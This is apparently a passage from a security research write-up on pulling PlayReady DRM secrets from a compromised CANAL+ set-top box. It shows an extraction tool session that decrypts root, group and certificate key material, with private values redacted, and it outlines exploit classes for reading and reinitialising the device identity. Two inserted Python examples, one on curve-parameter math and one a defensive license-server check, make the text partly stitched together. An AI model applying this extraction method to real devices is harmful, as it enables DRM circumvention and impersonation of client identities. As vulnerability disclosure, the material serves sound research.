y_pow_2: 89f22bde94e6e39ba47c6ccd5218dac0283c3d05ede98bd597512615736e8dc8
ecaffine_on_curve: true
real_a_bi: ffffffff00000001000000000000000000000000fffffffffffffffffffffffc
real_b_bi: 5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
real_genx_bi: 6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
real_geny_bi: 4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
```

The `real` variables are the ones used by the P-256 curve. The other ones are those used by the MS Play Ready binary (with the affine MOD transformation taken into account).

### THE IMPORTANCE OF SECURE DEVICES (AND PROMPT PATCHING)

The presented case demonstrates the implications that a single compromised (and unpatched by the vendor) device can have for the security of the whole platform. One such device can pose a significant security risk from a content security point of view.

### THE IMPACT OF A COMPROMISED DEVICE ROOT KEY

A compromised device root key, along with the MS PlayReady binary used by that device, is sufficient to extract all PlayReady key data required to impersonate a client identity.
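The curve parameter derivation from the LITTLE REVERSE ENGINEERING OBSTACLES section can be reproduced offline. The following Python is an added example, not code from the toolkit or from the `reversing\curve_params` program; it assumes (my inference from the listed `a`, which equals -3*2^256 mod p) that the MOD-space transformation is Montgomery form with F = 2^256 mod p, and it checks the recovered parameters against the published P-256 constants:

```python
# Added example, not code from the toolkit: recover the textbook NIST P-256
# parameters from the transformed constants of the `reversing\curve_params`
# listing, and run the on-curve check in both representations.
# Assumption (mine, consistent with the listed values): the "affine
# transformation to MOD space" is Montgomery form with R = 2^256, so the
# factor F in X = x*F is R mod p and F^-1 is R^-1 mod p.

P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
# constants as found in the binary (copied from the listing above)
A_MOD = 0xfffffffc00000004000000000000000000000003fffffffffffffffffffffffc
B_MOD = 0xdc30061d04874834e5a220abf7212ed6acf005cd78843090d89cdf6229c4bddf
# published NIST P-256 parameters, used only to confirm the recovery
REAL_A = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
REAL_B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
REAL_GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
REAL_GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5

F = (1 << 256) % P          # the transformation factor
F_INV = pow(F, -1, P)       # F^-1 mod p (Python 3.8+)

def to_mod(v):
    """Textbook value -> MOD space: X = x*F mod p."""
    return v * F % P

def from_mod(v):
    """MOD space -> textbook value: x = X*F^-1 mod p."""
    return v * F_INV % P

def mod_mul(a, b):
    """Product that stays in MOD space: (aF)(bF)F^-1 = (ab)F."""
    return a * b * F_INV % P

def recover_params():
    """real_a = A*F^-1 and real_b = B*F^-1, the result derived in the text."""
    return from_mod(A_MOD), from_mod(B_MOD)

def on_curve_plain(x, y, a, b):
    """Textbook check y^2 = x^3 + a*x + b (mod p)."""
    return (y * y - (x * x * x + a * x + b)) % P == 0

def on_curve_mod(X, Y):
    """The same check on transformed coordinates, evaluated in the order the
    listing names suggest: x_pow_2 -> +a -> *x -> +b. Every product is a
    mod_mul; A_MOD and B_MOD are added directly, they already live in MOD space."""
    x_pow_2_plus_a = (mod_mul(X, X) + A_MOD) % P
    x_pow_3_plus_ax_plus_b = (mod_mul(x_pow_2_plus_a, X) + B_MOD) % P
    return mod_mul(Y, Y) == x_pow_3_plus_ax_plus_b

if __name__ == "__main__":
    a, b = recover_params()
    print("real_a matches P-256:", a == REAL_A)
    print("real_b matches P-256:", b == REAL_B)
    # the generator, moved into MOD space, must pass the transformed check
    print("G on curve (MOD space):", on_curve_mod(to_mod(REAL_GX), to_mod(REAL_GY)))
    # the (x, y) pair of the listing, checked the same way
    x = 0xc8b6af16ee941aadaa5389b4af2c10e356be42af175ef3face93254e7b0b3d9b
    y = 0x982b27b5cb2341326e56aa857dbfd5c634ce2cf9ea74fca8f2af5957efeea562
    print("listing point on curve (MOD space):", on_curve_mod(x, y))
```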
The extraction of these secrets is illustrated below:

```
msprcp> extractsecrets mspr_binary\libstd_cai_client_drm_msplayready.so
ROOT DEVICE KEY
PRV
mod: *REMOVED*
exp: *REMOVED*
PUB
mod: c420ffde51d23a1e067787861f013ad739e5a90bc77b128fd4366c0609c56b168905646d3c4eeace4a62766b5fe6bf7344d7338ddf30bd0a17869756107121a2cf616e4a24275d6e71476e047fffb4f412c869a537026cdd09c4437c1bf0f8a8f93abd62da0c8d0e8ed6c416e03a4cb343f8d3d0987c84f1dfb2a2641a845d28d81df033c86b147915e77cc37b8ad6f4bc647c41934d7f4527a0420de6bd6921e58179cc0dd8b49a7ead91f83dd959d6e2e45731674aba92c63ea0510fb749e55755a5afe0b259268a6826c4e1c947808df28ef907664010a4072ca935819572e63f4905b49a6cc3cf25b4fc078b4c38a10ba86bf68b20b0eee1a48b52972ae9
exp: 10001
- decrypting keys image (K1)
K1
0000: *REMOVED*
- decrypting template certificate (T1)
T1
0000: 30 30 30 30 30 66 61 63 ff fe 3c 00 44 00 45 00 00000fac..<.D.E.
0010: 56 00 43 00 45 00 52 00 54 00 20 00 76 00 65 00 V.C.E.R.T...v.e.
0020: 72 00 73 00 69 00 6f 00 6e 00 3d 00 22 00 31 00 r.s.i.o.n.=.".1.
0030: 2e 00 30 00 22 00 3e 00 3c 00 43 00 45 00 52 00 ..0.".>.<.C.E.R.
0040: 54 00 49 00 46 00 49 00 43 00 41 00 54 00 45 00 T.I.F.I.C.A.T.E.
0050: 20 00 74 00 79 00 70 00 65 00 3d 00 22 00 44 00 ..t.y.p.e.=.".D.
0060: 45 00 56 00 49 00 43 00 45 00 22 00 3e 00 3c 00 E.V.I.C.E.".>.<.
0070: 44 00 41 00 54 00 41 00 3e 00 3c 00 55 00 4e 00 D.A.T.A.>.<.U.N.
0080: 49 00 51 00 55 00 45 00 49 00 44 00 20 00 70 00 I.Q.U.E.I.D...p.
0090: 72 00 69 00 76 00 61 00 74 00 65 00 3d 00 22 00 r.i.v.a.t.e.=.".
00a0: 31 00 22 00 3e 00 3c 00 2f 00 55 00 4e 00 49 00 1.".>.<./.U.N.I.
00b0: 51 00 55 00 45 00 49 00 44 00 3e 00 3c 00 50 00 Q.U.E.I.D.>.<.P.
00c0: 55 00 42 00 4c 00 49 00 43 00 4b 00 45 00 59 00 U.B.L.I.C.K.E.Y.
00d0: 20 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 ..p.r.i.v.a.t.e.
00e0: 3d 00 22 00 31 00 22 00 3e 00 3c 00 2f 00 50 00 =.".1.".>.<./.P.
00f0: 55 00 42 00 4c 00 49 00 43 00 4b 00 45 00 59 00 U.B.L.I.C.K.E.Y.
0100: 3e 00 3c 00 4b 00 45 00 59 00 44 00 41 00 54 00 >.<.K.E.Y.D.A.T.
0110: 41 00 3e 00 3c 00 2f 00 4b 00 45 00 59 00 44 00 A.>.<./.K.E.Y.D.
0120: 41 00 54 00 41 00 3e 00 3c 00 2f 00 44 00 41 00 A.T.A.>.<./.D.A.
0130: 54 00 41 00 3e 00 3c 00 4d 00 53 00 44 00 52 00 T.A.>.<.M.S.D.R.
0140: 4d 00 5f 00 53 00 49 00 47 00 4e 00 41 00 54 00 M._.S.I.G.N.A.T.
0150: 55 00 52 00 45 00 5f 00 56 00 41 00 4c 00 55 00 U.R.E._.V.A.L.U.
0160: 45 00 3e 00 3c 00 2f 00 4d 00 53 00 44 00 52 00 E.>.<./.M.S.D.R.
0170: 4d 00 5f 00 53 00 49 00 47 00 4e 00 41 00 54 00 M._.S.I.G.N.A.T.
...
0f30: 44 00 63 00 45 00 69 00 6e 00 39 00 78 00 6a 00 D.c.E.i.n.9.x.j.
0f40: 6f 00 79 00 65 00 51 00 3d 00 3d 00 3c 00 2f 00 o.y.e.Q.=.=.<./.
0f50: 4d 00 53 00 44 00 52 00 4d 00 5f 00 53 00 49 00 M.S.D.R.M._.S.I.
0f60: 47 00 4e 00 41 00 54 00 55 00 52 00 45 00 5f 00 G.N.A.T.U.R.E._.
0f70: 56 00 41 00 4c 00 55 00 45 00 3e 00 3c 00 2f 00 V.A.L.U.E.>.<./.
0f80: 43 00 45 00 52 00 54 00 49 00 46 00 49 00 43 00 C.E.R.T.I.F.I.C.
0f90: 41 00 54 00 45 00 3e 00 3c 00 2f 00 44 00 45 00 A.T.E.>.<./.D.E.
0fa0: 56 00 43 00 45 00 52 00 54 00 3e 00 00 00 00 00 V.C.E.R.T.>.....
0fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0fc0: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................
- decrypting binary group certificate (G1)
G1
0000: 30 30 30 30 30 36 37 34 43 48 41 49 00 00 00 01 00000674CHAI....
0010: 00 00 06 6c 00 00 00 00 00 00 00 03 43 45 52 54 ...l........CERT
0020: 00 00 00 01 00 00 01 b8 00 00 01 28 00 01 00 01 ...........(....
0030: 00 00 00 58 8c d9 41 78 62 d9 cf 0f 25 f8 55 ab ...X..Axb...%.U.
0040: e1 35 80 63 00 00 07 d0 00 00 00 00 00 00 00 04 .5.c............
0050: 10 4f ba 64 a3 77 f4 3c 94 bc 25 b2 cf 42 7c a3 .O.d.w.<..%..B|.
0060: e7 4f a2 c1 97 02 72 cf 4e e5 78 41 59 de 8f ab .O....r.N.xAY...
0070: ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ................
0080: 00 00 00 00 00 01 00 05 00 00 00 10 00 00 00 01 ................
0090: 00 00 00 04 00 01 00 06 00 00 00 60 00 00 00 01 ................
00a0: 00 01 02 00 00 00 00 00 ae 51 7c 73 44 23 eb 9b .........Q|sD#..
00b0: 5b 06 3d 5c 3a 20 63 60 cf 93 b3 8a a0 52 b7 3c [.=.:.c......R.<
00c0: c7 22 cf 9b 54 ab 0d 58 2e b5 56 fa c8 ed 83 28 ."..T..X..V....(
00d0: 8f 3b 91 4d 85 2d 29 1c f2 34 1b f4 ae d8 21 57 .;.M.-)..4....!W
00e0: 64 8b 64 ab 27 69 85 62 00 00 00 02 00 00 00 01 d.d.'i.b........
00f0: 00 00 00 06 00 00 00 07 00 00 00 50 00 00 00 00 ...........P....
0100: 00 00 00 20 41 64 76 61 6e 63 65 64 20 44 69 67 ....Advanced.Dig
0110: 69 74 61 6c 20 42 72 6f 61 64 63 61 73 74 20 53 ital.Broadcast.S
0120: 2e 41 2e 00 00 00 00 0a 49 54 49 2d 32 38 35 31 .A......ITI-2851
0130: 53 00 00 00 00 00 00 0a 49 54 49 2d 32 38 35 31 S.......ITI-2851
0140: 53 00 00 00 00 01 00 08 00 00 00 90 00 01 00 40 S..............@
0150: 04 df b1 9b 28 1f b5 17 42 4e 63 e8 88 57 f5 70 ....(...BNc..W.p
0160: 27 8e 95 e7 98 f0 40 ae e0 08 2b 84 da 58 e7 f7 '.....@...+..X..
0170: 58 93 92 59 01 df d2 74 97 56 51 15 44 f7 4b 49 X..Y...t.VQ.D.KI
...
04e0: 50 6c 61 79 52 65 61 64 79 20 53 4c 32 30 30 30 PlayReady.SL2000
04f0: 20 44 65 76 69 63 65 20 2b 20 4c 69 6e 6b 20 52 .Device.+.Link.R
0500: 6f 6f 74 20 43 41 00 00 00 00 00 00 00 00 00 00 oot.CA..........
0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0560: 00 00 00 80 31 2e 30 2e 30 2e 31 00 00 00 00 00 ....1.0.0.1.....
0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05e0: 00 00 00 00 00 01 00 08 00 00 00 90 00 01 00 40 ...............@
05f0: e9 eb 63 e5 f1 ba 51 cd 37 c0 bd 4e 2e 63 95 0b ..c...Q.7..N.c..
0600: 2e 20 10 4a fe b9 95 a9 7d eb d3 4c 46 28 76 73 ...J....}..LF(vs
0610: b3 9c eb e7 5d 9a 76 4b d2 05 5a 87 75 56 1f c1 ....].vK..Z.uV..
0620: fe 4e 72 91 da 44 57 98 ad ca e5 40 0f 71 15 2e .Nr..DW....@.q..
0630: 00 00 02 00 86 4d 61 cf f2 25 6e 42 2c 56 8b 3c .....Ma..%nB,V.<
0640: 28 00 1c fb 3e 15 27 65 85 84 ba 05 21 b7 9b 18 (...>.'e....!...
0650: 28 d9 36 de 1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca (.6...j.....z...
0660: 29 46 f1 f6 4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 )F..J...]...CN.B
0670: 93 fa c5 ab 00 00 00 00 00 00 00 00 00 00 00 00 ................
0680: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................
- decrypting private ECC group key (Z1)
Z1
0000: *REMOVED*
msprcp>
```

It is worth mentioning that CANAL+ STB boxes might share root keys across different models, or the keys might get changed at SW upgrade time. This could not be verified though, as access to only one compromised STB model with PlayReady functionality was obtained. Finally, some additional attack ideas have not been verified in practice.

### MS PLAY READY SPECIFIC CODE OF STB EXPLOIT

The code of the `Drm` class implements the `test adbdecrypt` command, which illustrates the way the root key could be read from a compromised STB. This class also implements the functionality for the "reinitialization" of the MS Play Ready client identity (`test reinit` command). The `MSPRHandler` class illustrates the dynamic tracing functionality used when reverse engineering PlayReady operation.
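Coming back to the DIFFICULT ATTRIBUTION section, the following Python is an added illustration of the proposed SCK-bound device identity, not CANAL+ or PlayReady code. It assumes a server-side registry holding a per-serial key derived from each box's chip secret at provisioning time, a nonce challenge answered with an HMAC over the nonce and the device cert digest, and simple per-device tracking of source IPs and request rate:

```python
# Added example, not CANAL+ or PlayReady code: a license-server-side gate that
# implements the DIFFICULT ATTRIBUTION proposal, i.e. the device identity is
# proven with a chip-secret-derived key rather than with a spoofable
# serial/MAC, and license requests are tracked per device for anomalies.
# Assumptions (mine): the server stores, per STB serial, a binding key derived
# from that box's SCK at provisioning time (the raw SCK never leaves the chip),
# and the client answers a fresh nonce with HMAC-SHA256(key, nonce || cert hash).
import hashlib
import hmac
import os
from collections import defaultdict

LABEL = b"mspr-devcert-binding|"   # constructed domain-separation label


def derive_binding_key(sck: bytes, serial: str) -> bytes:
    """Per-device key derived from the chip secret; known to box and server."""
    return hmac.new(sck, LABEL + serial.encode(), hashlib.sha256).digest()


def client_response(binding_key: bytes, nonce: bytes, cert_digest: bytes) -> bytes:
    """What a genuine STB computes inside its secure environment."""
    return hmac.new(binding_key, nonce + cert_digest, hashlib.sha256).digest()


class LicenseGate:
    """Server side: challenge/response check plus per-device request tracking."""

    def __init__(self, registry, max_ips=2, max_reqs=20, window=3600):
        self.registry = registry            # serial -> binding key
        self.pending = {}                   # serial -> outstanding nonce
        self.seen_ips = defaultdict(set)    # serial -> source IPs observed
        self.requests = defaultdict(list)   # serial -> request timestamps
        self.max_ips, self.max_reqs, self.window = max_ips, max_reqs, window

    def challenge(self, serial: str) -> bytes:
        nonce = os.urandom(16)
        self.pending[serial] = nonce
        return nonce

    def verify(self, serial, cert_digest, response, src_ip, now) -> str:
        key = self.registry.get(serial)
        nonce = self.pending.pop(serial, None)   # one-shot nonce: no replay
        if key is None or nonce is None:
            return "reject:unknown-device-or-no-challenge"
        expected = client_response(key, nonce, cert_digest)
        if not hmac.compare_digest(expected, response):
            # a stolen group cert plus a copied serial/MAC ends here: no SCK, no key
            return "reject:binding-mismatch"
        self.seen_ips[serial].add(src_ip)
        recent = [t for t in self.requests[serial] if now - t < self.window]
        recent.append(now)
        self.requests[serial] = recent
        if len(self.seen_ips[serial]) > self.max_ips or len(recent) > self.max_reqs:
            return "flag:anomalous-usage"   # grant or hold, but alert operators
        return "grant"
```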